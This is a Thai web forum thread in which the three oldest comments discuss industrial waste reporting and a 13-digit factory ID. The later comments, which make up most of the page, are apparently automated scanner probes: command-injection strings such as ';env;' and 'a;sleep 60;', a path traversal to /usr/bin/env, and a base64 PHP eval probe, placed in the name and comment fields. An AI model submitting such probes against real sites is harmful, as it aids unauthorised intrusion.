ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:03 น.
 
ความคิดเห็นที่ 60
/e
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:58 น.
 
ความคิดเห็นที่ 59
env
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:57 น.
 
ความคิดเห็นที่ 58
set
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:57 น.
 
ความคิดเห็นที่ 57
&set&
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:57 น.
 
ความคิดเห็นที่ 56
Hi there!
env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:57 น.
 
ความคิดเห็นที่ 55
Hi there!;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:56 น.
 
ความคิดเห็นที่ 54
../../../../../../../../../../../../../../../usr/bin/env|
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:56 น.
 
ความคิดเห็นที่ 53
a);env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:56 น.
 
ความคิดเห็นที่ 52
a;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:56 น.
 
ความคิดเห็นที่ 51
|env
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:55 น.
 
ความคิดเห็นที่ 50
;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:55 น.
 
ความคิดเห็นที่ 49
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:54 น.
 
ความคิดเห็นที่ 48
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:54 น.
 
ความคิดเห็นที่ 47
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:54 น.
 
ความคิดเห็นที่ 46
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:53 น.
 
ความคิดเห็นที่ 45
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:53 น.
 
ความคิดเห็นที่ 44
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:53 น.
 
ความคิดเห็นที่ 43
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:52 น.
 
ความคิดเห็นที่ 42
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:52 น.
 
ความคิดเห็นที่ 41
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:52 น.
 
ความคิดเห็นที่ 40
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:51 น.
 
ความคิดเห็นที่ 39
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:51 น.
 
ความคิดเห็นที่ 38
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:51 น.
 
ความคิดเห็นที่ 37
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:50 น.
 
ความคิดเห็นที่ 36
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:50 น.
 
ความคิดเห็นที่ 35
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:49 น.
 
ความคิดเห็นที่ 34
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:49 น.
 
ความคิดเห็นที่ 33
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:48 น.
 
ความคิดเห็นที่ 32
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:48 น.
 
ความคิดเห็นที่ 31
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:47 น.
 
ความคิดเห็นที่ 30
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:47 น.
 
ความคิดเห็นที่ 29
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:46 น.
 
ความคิดเห็นที่ 28
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:45 น.
 
ความคิดเห็นที่ 27
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:44 น.
 
ความคิดเห็นที่ 26
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:44 น.
 
ความคิดเห็นที่ 25
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:44 น.
 
ความคิดเห็นที่ 24
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:43 น.
 
ความคิดเห็นที่ 23
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:43 น.
 
ความคิดเห็นที่ 22
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:43 น.
 
ความคิดเห็นที่ 21
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:13:42 น.
 
ความคิดเห็นที่ 20
Hi there!
 
ผู้ตั้ง : &ping -n 25 127.0.0.1& วันที่ : 09 ส.ค. 64 06:13:42 น.
 
ความคิดเห็นที่ 19
Hi there!
 
ผู้ตั้ง : a|sleep 60; วันที่ : 09 ส.ค. 64 06:13:42 น.
 
ความคิดเห็นที่ 18
Hi there!
 
ผู้ตั้ง : a;sleep 60; วันที่ : 09 ส.ค. 64 06:13:42 น.
 
ความคิดเห็นที่ 17
Hi there!
 
ผู้ตั้ง : a`sleep 60` วันที่ : 09 ส.ค. 64 06:13:41 น.
 
ความคิดเห็นที่ 16
Hi there!
 
ผู้ตั้ง : a`)` วันที่ : 09 ส.ค. 64 06:13:41 น.
 
ความคิดเห็นที่ 15
Hi there!
 
ผู้ตั้ง : data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg== วันที่ : 09 ส.ค. 64 06:13:41 น.
 
ความคิดเห็นที่ 14
Hi there!
 
ผู้ตั้ง : /e วันที่ : 09 ส.ค. 64 06:13:37 น.
 
ความคิดเห็นที่ 13
Hi there!
 
ผู้ตั้ง : env วันที่ : 09 ส.ค. 64 06:13:37 น.
 
ความคิดเห็นที่ 12
Hi there!
 
ผู้ตั้ง : set วันที่ : 09 ส.ค. 64 06:13:36 น.
 
ความคิดเห็นที่ 11
Hi there!
 
ผู้ตั้ง : &set& วันที่ : 09 ส.ค. 64 06:13:36 น.
 
ความคิดเห็นที่ 10
Hi there!
 
ผู้ตั้ง : default env; วันที่ : 09 ส.ค. 64 06:13:35 น.
 
ความคิดเห็นที่ 9
Hi there!
 
ผู้ตั้ง : default;env; วันที่ : 09 ส.ค. 64 06:13:35 น.
 
ความคิดเห็นที่ 8
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../usr/bin/env| วันที่ : 09 ส.ค. 64 06:13:35 น.
 
ความคิดเห็นที่ 7
Hi there!
 
ผู้ตั้ง : a);env; วันที่ : 09 ส.ค. 64 06:13:35 น.
 
ความคิดเห็นที่ 6
Hi there!
 
ผู้ตั้ง : a;env; วันที่ : 09 ส.ค. 64 06:13:34 น.
 
ความคิดเห็นที่ 5
Hi there!
 
ผู้ตั้ง : |env วันที่ : 09 ส.ค. 64 06:13:34 น.
 
ความคิดเห็นที่ 4
Hi there!
 
ผู้ตั้ง : ;env; วันที่ : 09 ส.ค. 64 06:13:34 น.
 
ความคิดเห็นที่ 3
ทำได้เลยครับ เพราะไม่มีการนำออก แต่อย่างไรก็ตาม กนอ.ยังคงต้องการรายงานประจำปีของการขนย้ายขยะสิ่งปฏิกูลมูลฝอยด้วยนะครับ โดยสรุป คือ นิคมอุตฯที่โรงงานของคุณตั้งอยู่ จะขอรายงานการจัดการขยะของเสียประจำปี 2 ส่วน คือ ส่วนแรกเป็นของเสียอุตสาหกรรม และส่วนที่ 2 ขยะสิ่งปฏิกูลมูลฝอย ครับ
 
ผู้ตั้ง : ปิยะชัย จันทรวงศ์ไพศาล วันที่ : 08 มี.ค. 59 12:00:58 น.
 
ความคิดเห็นที่ 2
พอดีเรามีการยื่นเอกสารไปที่กรมโรงงานแล้วค่ะ โดยใช้เลขทะเบียนโรงงาน แล้วก็มีการขอขายาเวลาในการกักเก็บ แล้วทางกรมก็อนุมัติให้จัดเก็บไว้ได้เนื่องจากปริมาณน้อย แบบนี้เราสามารถปริ้นเอกสารที่ขอขยายเวลาจัดเก็บแล้ว ทำเอกสาร รายงาน สก1 ให้กับ กนอ ได้หรือเปล่าคะ โดยไม่ต้องรอเลข 13 หลัก
 
ผู้ตั้ง : สุจิตรา วันที่ : 08 มี.ค. 59 11:07:25 น.
 
ความคิดเห็นที่ 1
ถ้าคุณเป็นโรงงาน ไม่มีเลขประจำตัว 13 หลัก ไม่สามารถดำเนินการใดๆได้ทางอิเล็คทรอนิกส์
ดังนั้น แนะนำให้ไปขอเลขประจำตัว 13 หลักก่อนครับ แล้วยื่นขยายด้วยแบบ สก.1
อย่าเข้าใจผิดว่าต้องใช้เลขประจำตัว 13 หลักเฉพาะของเสียอันตรายเท่านั้น แต่ใช้สำหรับขยะของเสียอุตสาหกรรม (Industrial waste) ทุกประเภทครับ
 
ผู้ตั้ง : ปิยะชัย จันทรวงศ์ไพศาล วันที่ : 26 ก.พ. 59 10:40:36 น.